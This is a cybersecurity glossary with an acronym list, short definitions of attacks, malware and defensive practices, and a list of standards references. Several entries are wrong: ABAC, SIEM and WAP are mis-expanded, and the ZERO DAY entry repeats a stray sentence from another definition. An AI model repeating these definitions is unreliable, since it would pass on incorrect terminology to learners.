Cyber Glossary

Acronyms

Acronym

 Description

3DES

Triple Data Encryption Standard

ABAC

Access-Based Access Control

ACL

Access Control List

ADP

Automated Data Processing

AES

Advance Encryption Standard

AH

Authentication Header

AIS

Automated Information System

AO

Area of Operations

ASR

Attack Surface Reduction

APT

Advanced Persistent Threat

BCP

Business Continuity Plan

BIA

Business Impact Analysis

BoD

Beginning of Day

BYOD

Bring Your Own Device

CA

Certificate Authority

CIO

Chief Information Officer

CISO

Chief Information Security Officer

CSO

Chief Security Officer

CAPEC

Common Attack Pattern Enumeration and Classification

CERT

Computer Emergency Response Team

CMMC

Cybersecurity Maturity Model Certification

CWPP

Cloud Workload Protection Platform

DES

Data Encryption Standard

DHS

Department of Homeland Security

DRP

Disaster Recovery Plan

DAC

Discretionary Access Control

DNS

Domain Name System

ECC

Elliptical Curve Cryptography

EFT

Electronic Funds Transfer

ESP

Encapsulation Security Payload

EW

Electronic Warfare

FISMA

Federal Information Security Modernization Act

FTP

File Transfer Protocol

FO

Forward Observer

GRC

Governance Risk and Compliance

HIPAA

Health Insurance Portability and Accountability Act

HTTP

Hypertext Transfer Protocol

HTTPS

Hypertext Transfer Protocol Secure

IaaS

Infrastructure as a Service

IAM

Identity & Access Management

IANA

Internet Assigned Numbers Authority

ICMP

Internet Control Message Protocol

IDS

Intrusion Detection System

IETF

Internet Engineering Task Force

IG

Interior Guard

IP

Internet Protocol

IPS

Intrusion Prevention System

IPSec

Internet Protocol Security

IPX

Internetwork Packet Exchange

IS

Information Systems

ISO

International Standards Organization

ISP

Internet Service Provider

KRI

Key Risk Indicator

LAN

Local Area Network

LDAP

Lightweight Directory Access Protocol

MAC

Mandatory Access Control

MAC

Media Access Control

MAC Address

Media Access Control Address

MAN

Metropolitan Area Network

MFA

Multi Factor Authentication

NAT

Network Address Translation

NetBIOS

Network Basic Input/Output System

NIC

Network Interface Controller or Network Interface Card

NIAP

National Information Assurance Partnership

NIST

National Institute for Standards and Technology

NNTP

Network News Transfer Protocol

OpSec

Operational Security

OS

Operating System

OSI

Open Systems Interconnections

OWASP

Open Web Application Security Project

PaaS

Platform as a Service

PIN

Personal Identification Number

PKI

Public Key Infrastructure

POTS

Plain Old Telephone Service

PSTN

Public Switched Telephone Network

RA

Registration Authority

RAS

Remote Access Service

RBAC

Role-Based Access Control

ROI

Return On Investment

RPO

Recovery Point Objective

RTO

Recovery Time Objective

SaaS

Software as a Service

SCADA

Supervisory Control and Data Acquisition

SDLC

Software Development Life Cycle

SDO

Service Delivery Objectives

SecaaS

Security as a Service

SET

Secure Electronic Transaction

SET

Social-Engineer Toolkit

SFA

Single Factor Authentication

SLA

Service Level Agreement

S/MIME

Secure Multipurpose Internet Mail Extension

SMTP

Simple Mail Transfer Protocol

SoD

Segregation/Separation of Duties

SoD

Start of Day

SPX

Sequenced Packet Exchange

SSH

Secure Shell

SSL

Secure Socket Layer

TCO

Total Cost of Ownership

TCP

Transmission Control Protocol

TCP/IP

Transmission Control Protocol/Internet Protocol

TKIP

Temperal Key Integrity Protocol

TLS

Transport Layer Security

URL

Uniform Resource Locator

UDP

User Datagram Protocol

VLAN

Virtual Local Area Network

VPN

Virtual Private Network

VoIP

Voice Over Internet Protocol

WAN

Wide Area Network

WAP

Wi-Fi Protected Access

WAP2

Wi-Fi Protected Access II

WEP

Wired Equivalent Privacy

WLAN

Wireless Local Area Network

XSS

Cross-Site Scripting

XDR

Extended Detection and Response

2FA

Two Factor Authentication

 

Glossary

ACCESS CONTROL
The process of granting or denying specific requests for or attempts to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities

ADVANCED PERSISTENT THREAT (APT)
An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception).

ADWARE
Software that displays unwanted advertisements on your computer. Bothersome but usually not dangerous, popping up unwanted advertising or even installing new toolbars.

AIR GAP
To physically separate or isolate a system from other systems or networks.

AUTORUN WORMS
Malicious programs introduced via external storage devices and designed to rapidly spread via Windows autorun feature.  These worms search for security holes, permitting the hacker to steal information, money or both. 

ATTACK PATH
The steps that an adversary takes or may take to plan, prepare for, and execute an attack.

ATTACK PATTERN
Similar cyber events or behaviors that may indicate an attack has occurred or is occurring, resulting in a security violation or a potential security violation.

ATTACK SIGNATURE
A characteristic or distinctive pattern that can be searched for or that can be used in matching to previously identified attacks.

ATTACK VECTOR
The path or means by which a hacker gains access to a computer or network server in order to deliver a payload or malicious outcome. Attack vectors enable hackers to exploit system vulnerabilities, including the human element.

AUTHENTICATION
The process of verifying the identity or other attributes of an entity (user, process, or device).

AUTHORIZATION
A process of determining, by evaluating applicable access control information, whether a subject is allowed to have the specified types of access to a particular resource.

BACKDOOR
A backdoor is a tool installed after a compromise to give an attacker easier access to the compromised system around any security mechanisms that are in place.

BEHAVIOR MONITORING
Observing activities of users, information systems, and processes and measuring the activities against organizational policies and rule, baselines of normal activity, thresholds, and trends.

BLACKLIST
A list of entities that are blocked or denied privileges or access.

BLENDED ATTACK
A cyber attack that comprises multiple attack vectors and malware is known as a blended attack. Such attacks usually cause severe damage to targeted systems.

BLUE TEAM
A group that defends an enterprise’s information systems when mock attackers (i.e., the Red Team) attack, typically as part of an operational exercise conducted according to rules established and monitored by a neutral group (i.e., the White Team).

BOT
A computer connected to the Internet that has been surreptitiously / secretly compromised with malicious logic to perform activities under the command and control of a remote administrator.

BROWSER HIJACKER
If you find that your Internet browser’s settings have changed on its own, including your selected search engine and default homepage, then you have got a browser hijacker in your system.

BRUTE FORCE ATTACK
In a brute force attack hackers try to crack encrypted data (passwords) by trying all possible combinations of words or letters.

BUG
An unexpected and relatively small defect, fault, flaw, or imperfection in an information system or device.

CHECKSUM
A value that is computed by a function that is dependent on the contents of a data object and is stored or transmitted together with the object, for the purpose of detecting changes in the data.

CIP
Critical Infrastructure Protection. The North American Electric Reliability Corporation (NERC), which FERC directed to develop Critical Infrastructure Protection (CIP) cyber security reliability standards.

CIPHERTEXT
Data or information in its encrypted form.

CLICKJACKING
Clickjacking is a technique used by an attacker to inject malicious code in clickable content in websites. Clickjacking is usually done to record the victim’s clicks on the Internet or drop a malware infection on the system.

CLOUD COMPUTING
A model for enabling on-demand network access to a shared pool of configurable computing capabilities or resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.

COMPUTER (DIGITAL) FORENSICS
The processes and tools to create a bit by bit copy of a an electronic device (collection and acquisition) for the purpose of analyzing and reporting evidence; gather and preserve evidence that is legally defensible and does not alter the original device or data.

CONTENT SPOOFING
Content spoofing is carried out by an attacker to trick their victims into visiting a fraudulent site that looks like the real one.

CONTINUITY OF OPERATIONS PLAN
A document that sets forth procedures for the continued performance of core capabilities and critical operations during any disruption or potential disruption.

CRITICAL INFRASTRUCTURE
The systems and assets, whether physical or virtual, so vital to society that the incapacity or destruction of such may have a debilitating impact on the security, economy, public health or safety, environment, or any combination of these matters.

CROSS SITE SCRIPTING (XSS)
Also known as XSS attacks, cross site scripting is a technique used by hackers to plant a malicious code into a genuine website. This allows hackers to gather user’s information and use it for nefarious purpose.

CRYPTANALYSIS
The operations performed in defeating or circumventing cryptographic protection of information by applying mathematical techniques and without an initial knowledge of the key employed in providing the protection.

CSIRT
Cyber Security Incident Response Team

CYBER MUNITIONS
Technology system that has a purpose of causing harm and destruction by altering the running state of another system without permission.

DATA BREACH
The unauthorized movement or disclosure of sensitive information to a party, usually outside the organization, that is not authorized to have or see the information.

DATA LOSS PREVENTION
A set of procedures and mechanisms to stop sensitive data from leaving a security boundary.

DATA MINING
The process or techniques used to analyze large sets of existing information to discover previously unrevealed patterns or correlations.

DENIAL OF SERVICE (DOS)
An attack that prevents or impairs the authorized use of information system resources or services.

DIGITAL FORENSICS
The processes and specialized techniques for gathering, retaining, and analyzing system-related data (digital evidence) for investigative purposes.

DIGITAL RIGHTS MANAGEMENT (DRM)
A form of access control technology to protect and manage use of digital content or devices in accordance with the content or device provider’s intentions.

DIGITAL SIGNATURE
A value computed with a cryptographic process using a private key and then appended to a data object, thereby digitally signing the data.

DISTRIBUTED DENIAL OF SERVICE (DDOS)
A denial of service technique that uses numerous systems to perform the attack simultaneously.

DMZ
DeMilitarized Zone. A physical or logical subnetwork where publicly facing internet connections occur; a subnetwork where an organization’s external- facing services are exposed to an untrusted network (i.e. internet).

DOXING
The process or technique of gathering personal information on a target or subject, and building a dossier with the intent to cause harm.

DYNAMIC ATTACK SURFACE
The automated, on-the-fly changes of an information system’s characteristics to thwart actions of an adversary.

ELECTRONIC SIGNATURE
Any mark in electronic form associated with an electronic document, applied with the intent to sign the document.

EMAIL SPOOFING
Email spoofing is how an attacker crafts the header of a malicious email so that user is tricked into viewing it. This technique is typically used in phishing attacks.

ENTERPRISE RISK MANAGEMENT
A comprehensive approach to risk management that engages people, processes, and systems across an organization to improve the quality of decision making for managing risks that may hinder an organization’s ability to achieve its objectives.

EVENT LOGS
The computer-based documentation log of all events occurring within a system.

EXFILTRATION
The unauthorized transfer of information from an information system.

EXPLOIT
A technique to breach the security of a network or information system in violation of security policy.

EXPOSURE
The condition of being unprotected, thereby allowing access to information or access to capabilities that an attacker can use to enter a system or network.

FIREWALL
A physical appliance or software designed to control inbound and/or outbound electronic access.

HASH VALUE
A numeric value resulting from applying a mathematical algorithm against a set of data such as a file.

HASHING
A process of applying a mathematical algorithm against a set of data to produce a numeric value (a “hash value”) that represents the data. The result of hashing is a value that can be used to validate if a file has been altered. Frequently used hash functions are MD5, SHA1 and SHA2

IDENTITY AND ACCESS MANAGEMENT
The methods and processes used to manage subjects and their authentication and authorizations to access specific objects.

IDENTITY THEFT
A menace in the IT security world, identity theft occurs when an attacker gathers personal information and use it to impersonate their victim. This way, the attacker can open illegal bank accounts, obtain credit cards, carry out transactions, etc., using the victim’s name.

INCIDENT
An occurrence that actually or potentially results in adverse consequences to an information system or the information that the system processes, stores, or transmits and that may require a response action to mitigate the consequences.

INCIDENT HANDLER (CYBER SECURITY)
The person assigned to lead a team of subject matter experts in cyber security and how to respond to adverse security events.

INDUSTRIAL CONTROL SYSTEM
An information system used to control industrial processes such as manufacturing, product handling, production, and distribution or to control infrastructure assets.

INSTANT MESSAGING (IM) WORM
Worm are malware that are capable of self-replicating and spreading across the Internet or the compromised network. Worms that spread via instant messaging networks are called IM worms.

INSIDER ATTACK
When someone with an authorized system access carries out malicious activities on a network or a computer, it is known as an insider attack or insider threat. The attacker might be an employee of the targeted business, or an outsider posing as an employee.

INTEGRITY
The property whereby information, an information system, or a component of a system has not been modified or destroyed in an unauthorized manner.

INTRUSION DETECTION
The process and methods for analyzing information from networks and information systems to determine if a security breach or security violation has occurred.

KEYLOGGER
Software or hardware that tracks keystrokes and keyboard events, usually surreptitiously / secretly, to monitor actions by the user of an information system.

LIKEJACKING
Likejacking is a part of the clickjacking technique. It usually targets users of the social network community such as Facebook. Scammers share unusual or compelling posts or videos to trick users into liking or sharing them thus, spreading the scam to other users.

MACRO VIRUS
A type of malicious code that attaches itself to documents and uses the macro programming capabilities of the document’s application to execute, replicate, and spread or propagate itself.

MALWARE
Software that compromises the operation of a system by performing an unauthorized function or process.

MAN-IN-THE-MIDDLE ATTACK
Abbreviated as MITM, this attack is launched by a hacker to intercept, record, and control the communication between two users.

MITIGATION
The application of one or more measures to reduce the likelihood of an unwanted occurrence and/or lessen its consequences.

MOVING TARGET DEFENSE
The presentation of a dynamic attack surface, increasing an adversary’s work factor necessary to probe, attack, or maintain presence in a cyber target.

MSSP
Managed Security Service Provider

NIST
National Institute of Standards and Technology. The 800 series (NIST 800) covers cyber and information security.

OPEN SOURCE
Denoting software whose original source code is made free and available with no restrictions on use, selling, distribution or modification of the code.

OPEN SOURCE INTELLIGENCE
Intelligence collected from publicly available sources

OPEN SOURCE TOOLS
Tools that are made with open source code.

OPERATIONAL EXERCISE
An action-based exercise where personnel rehearse reactions to an incident scenario, drawing on their understanding of plans and procedures, roles, and responsibilities.

PACKET CAPTURES
The process of collecting, or capturing, network packets as they are being sent and received; used in diagnosing and solving network problems.

PENETRATION TESTING (PEN TEST)
An evaluation methodology whereby assessors actively probe for vulnerabilities and attempt to circumvent the security features of a network and/or information system.

PHARMING
Pharming is when a user is redirected to a fake website without their consent or knowledge. In most cases, the fake website looks exactly similar to the actual website that the user intended to visit.

PHISHING
A digital form of social engineering to deceive individuals into providing sensitive information.

POLYMORPHIC VIRUS
A polymorphic virus is a malicious program that modifies itself when it replicates. This technique enables it to evade detection by security software.

PRIVATE KEY
A cryptographic key that must be kept confidential and is used to enable the operation of an asymmetric (public key) cryptographic algorithm.

PUBLIC KEY
The publicly-disclosed component of a pair of cryptographic keys used for asymmetric cryptography.

PURPLE TEAMING
A team established to bring the red and blue teams together, better leveraging an organizations expertise.

RAT (Remote Access Trojans)
A RAT is a malicious program that can allow a hacker to take over a system from another physical location. Using this malware, the attacker can access and steal confidential and personal data from the infected machine.

RANSOMWARE
Ransomware is a malicious program that performs the following malicious activities after infecting a computer:
– Makes the system non-functional unless the victim agrees to pay a ransom.
– Encrypts the computer’s data and demands a ransom to release it to the victim.

RDP
Remote Desktop Protocol. A Microsoft protocol through which a desktop or server may be accessed by a remote client.

RECOVERY
The activities after an incident or event to restore essential services and operations in the short and medium term and fully restore all capabilities in the longer term.

RED TEAM
A group authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s cybersecurity posture.

REDUNDANCY
Additional or alternative systems, sub-systems, assets, or processes that maintain a degree of overall functionality in case of loss or failure of another system, sub-system, asset, or process.

RESILIENCE
The ability to adapt to changing conditions and prepare for, withstand, and rapidly recover from disruption.

RESPONSE
The activities that address the short-term, direct effects of an incident and may also support short-term recovery.

REVERSE SOCIAL ENGINEERING ATTACK
In this kind of cyberattack, the attacker convinces a user that they have a problem and that the attacker has a solution to the problem. For instance, an attacker creates a problem for the target. Then the attacker advertises themself as the solution provider, with an intention of luring the victim to divulge sensitive information.

RISK MANAGEMENT
The process of identifying, analyzing, assessing, and communicating risk and accepting, avoiding, transferring or controlling it to an acceptable level considering associated costs and benefits of any actions taken.

ROAMING PROFILE
A configuration in which the user profile within the domain is stored on a server and allows authorized users to log on to any computer within a network domain and have a consistent desktop experience.

ROOTKIT
A set of software tools with administrator-level access privileges installed on an information system and designed to hide the presence of the tools, maintain the access privileges, and conceal the activities conducted by the tools.

SCRIPTKIDDIE
An unskilled or non-sophisticated individual using pre-made hacking techniques and software to attack networks and deface websites.

SECURITY AUTOMATION
The use of information technology in place of manual processes for cyber incident response and management.

SECURITY POLICY
A rule or set of rules that govern the acceptable use of an organization’s information and services to a level of acceptable risk and the means for protecting the organization’s information assets.

SESSION HIJACKING
Session hijacking is an attack wherein a hacker takes control of a computer session to perform illegal activities such as taking over the victim’s online accounts.

SHOULDER SURFING
Shoulder surfing refers to spying on a user to obtain personal or private information such as PINs, passwords, security codes, etc. Here, the criminal usually looks over a person’s shoulder while the latter might be using an ATM, phone or other electronic device.

SIEM
System Incident and Event Management. Tools and processes that collect data generated from devices and services to perform real time and historical correlated analysis to detect security, compliance and service levels events.

SIGNATURE
A recognizable, distinguishing pattern.

SITUATIONAL AWARENESS
Comprehending information about the current and developing security posture and risks, based on information gathered, observation and analysis, and knowledge or experience.

SMISHING
SMiShing is a type of a phishing attack where targets are sent fake or malicious SMSs. These SMSs are designed to steal personal information from the target, or trick them into visiting a phishing website.

SOFTWARE ASSURANCE
The level of confidence that software is free from vulnerabilities, either intentionally designed into the software or accidentally inserted at any time during its lifecycle, and that the software functions in the intended manner.

SPAM
Spam is defined as unwanted or unexpected emails sent in bulk. Mostly, spam is used to distribute malware.

SPEARPHISHING
An email or electronic communications scam targeted towards a specific individual, organization, or business.

SPOOFING
Faking the sending address of a transmission to gain illegal or unauthorized entry into a secure system. Extended The deliberate inducement of a user or resource to take incorrect action. Note: Impersonating, masquerading, piggybacking, and mimicking are forms of spoofing.

SPYWARE
Software that is secretly or surreptitiously installed into an information system without the knowledge of the system user or owner.

SQL Injection
An SQL injection is performed by an attacker to exploit a poorly-designed application to produce unwanted database query results. For instance, an attacker can insert a malicious code into a Web form that is used for user authentication. Via this code, the attacker can send his request to the database and perform illicit activities.

TABLETOP EXERCISE
A discussion-based exercise where personnel meet in a classroom setting or breakout groups and are presented with a scenario to validate the content of plans, procedures, policies, cooperative agreements or other information for managing an incident.

TARGETED ATTACK
A targeted attack is a highly focused attack on specific individuals or an organization. Hackers use this technique to persistently pursue its target while remaining anonymous, for a long-term period.

THREAT AGENT
An individual, group, organization, or government that conducts or has the intent to conduct detrimental activities.

THREAT ASSESSMENT
The product or process of identifying or evaluating entities, actions, or occurrences, whether natural or man-made, that have or indicate the potential to harm life, information, operations, and/or property.

TICKET
In access control, data that authenticates the identity of a client or a service and, together with a temporary encryption key (a session key), forms a credential.

TOPOLOGY DIAGRAM
A schematic diagram displaying how the various elements in a network communicate with each other. A topology diagram may be physical or logical.

TRAFFIC LIGHT PROTOCOL
A set of designations employing four colors (RED, AMBER, GREEN, and WHITE) used to ensure that sensitive information is shared with the correct audience.

TROJAN HORSE
A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program.

URL Spoofing
A technique used by hackers to create a fake URL that impersonates the URL of a secure or legitimate website. A spoofed URL looks exactly like the one of the original website, but redirects users to a phishing or a malicious site.

VIRUS
A computer program that can replicate itself, infect a computer without permission or knowledge of the user, and then spread or propagate to another computer.

VISHING
Voice phishing where a hacker uses voice calls to trick users into divulging personal or financial information.

VULNERABILITY
A characteristic or specific weakness that renders an organization or asset (such as information or an information system) open to exploitation by a given threat or susceptible to a given hazard. Extended Characteristic of location or security posture or of design, security procedures, internal controls, or the implementation of any of these that permit a threat or hazard to occur. Vulnerability (expressing degree of vulnerability): qualitative or quantitative expression of the level of susceptibility to harm when a threat or hazard is realized.

WEBSITE SPOOFING
Website spoofing refers to creating a fake site that looks exactly like a trusted and popular website, in order to collect personal or financial information from users. Spoofed websites are created using legitimate logos, colors, designs, etc., to make them look realistic.

WHITE TEAM
A group responsible for refereeing an engagement between a Red Team of mock attackers and a Blue Team of actual defenders of information systems.

WHITELIST
A list of entities that are considered trustworthy and are granted access or privileges.

WORK FACTOR
An estimate of the effort or time needed by a potential adversary, with specified expertise and resources, to overcome a protective measure.

WORM
A self-replicating, self-propagating, self-contained program that uses networking mechanisms to spread itself.

ZERO DAY
The Zero Day is the day a new vulnerability is made known. In some cases, a zero day exploit is referred to an exploit for which no patch is available yet. (Day one is day at which the patch is made available). Comprehending information about the current and developing security posture and risks, based on information gathered, observation and analysis, and knowledge or experience.


Library

CNSSI 4009, National Information Assurance (IA) Glossary, June 2006.
CISSPÆ All-in-One Exam Guide, Forth Edition, Shon Harris, The McGraw-Hill Companies, 2008.
Official (ISC)2 Æ Guide To The CISSPÆ CBK by Harold F. Tipton, et. al., Auerbach Publications, 2006.
Official (ISC)2 Æ Guide To The CISSPÆ Exam by Susan Hansche, et. al., Auerbach Publications, 2004.
NIST SP 800-16, Information Technology Security Training Requirements: A Role- and Performance-Based Model, April 1998.
NIST SP 800-30, Risk Management Guide for Information Technology Systems, July 2002.
NIST SP 800-37, Guide for the Security Certification and Accreditation of Federal Information Systems, May 2004.
NIST SP 800-53, Rev. 2, Recommended Security Controls for Federal Information Systems, December 2007.
NIST SP 800-64 Rev. 1, Security Considerations in the Information System Development Life Cycle, June 2004.
NIST SP 800-61, Computer Security Incident Handling Guide, January, 2004.
NIST SP 800-65, Integrating IT Security into the Capital Planning and Investment Control Process, January 2005.
NIST SP 800-67, Recommendation for the Triple Data Encryption Algorithm (TDEA) Block Cipher, May 2004.
NIST SP 800-77, Guide to IPsec VPNs, December 2005.
FIPS 46-3, Data Encryption Standard (DES), October 1999.
FIPS 140-2, Security Requirements for Cryptographic Modules, May 2001.
FIPS 180-2, Secure Hash Standard (SHS), August 2002.
FIPS 185, Escrowed Encryption Standard, February 1994.
FIPS 186-2, Digital Signature Standard (DSS), January 2000.
FIPS 197, Advanced Encryption Standard, November 2001.
FIPS 198, The Keyed-Hashed Message Authentication Code (HMAC), March 2002.
FIPS 199, Standards for Security Categorization of Federal Information and Information Systems, December 2003.
FIPS 200, Minimum Security Requirements for Federal Information and Information Systems, March 2006.
Information Assurance Technical Framework (IATF), Release 3.1, NSA IA Solutions Technical Directors, September 2002.
ISO/IEC 15408-1:2005, Evaluation Criteria for IT Security ñ Part 1: Introduction and General Model, 2005.
ISO/IEC 15408-2:2005, Evaluation Criteria for IT Security ñ Part 2: Security Functional Requirements, 2005.
ISO/IEC 15408-3:2005, Evaluation Criteria for IT Security ñ Part 3: Security Assurance Requirements, 2005.
BS ISO/IEC 17799:2005, Code of Practice for Information Security Management, 2005.
Control Objectives for Information and related Technology (COBIT), Release 4.0, IT Governance Institute, 2005.
ISO/IEC 21827, Systems Security Engineering ñ Capability Maturity Model (SSE-CMMÆ), 2002.
ISO/IEC 27001, Information Security Management Systems ñ Requirements, 2005.
Draft MIL-STD-499C, Systems Engineering, Aerospace Corporation, April 15, 2005.
ISO/IEC 15288:2008(E), IEEE Std 15288-2008, Systems and Software Engineering ñ System Life Cycle Processes, February 1, 2008.
IEEE STD 1220-2005, IEEE Standard for Application and Management of the Systems Engineering Process, September 9, 2005.
IEEE/EIA 12207.0-1996, Industrial Implementation of International Standard ISO/IEC 12207:1995 Software Life Cycle Processes, March 1998.
IEEE/EIA 12207.1-1997, Industrial Implementation of International Standard ISO/IEC 12207:1995 Software Life Cycle ProcessesóLife Cycle Data, April 1998.
IEEE/EIA 12207.2-1997, Industrial Implementation of International Standard ISO/IEC 12207:1995 Software Life Cycle ProcessesóImplementation Considerations, April 1998.
DoD 5200.28-STD, Department of Defense Trusted Computer System Evaluation Criteria, December 1985. (a.k.a. Orange Book).
NCSC-TG-003, Version-1 A, Guide to Understanding Discretionary Access Control in Trusted Systems, September 30, 1987. (a.k.a. Neo-Orange Book).
Information Technology Security Evaluation Criteria (ITSEC), Version 1.2, June 1991.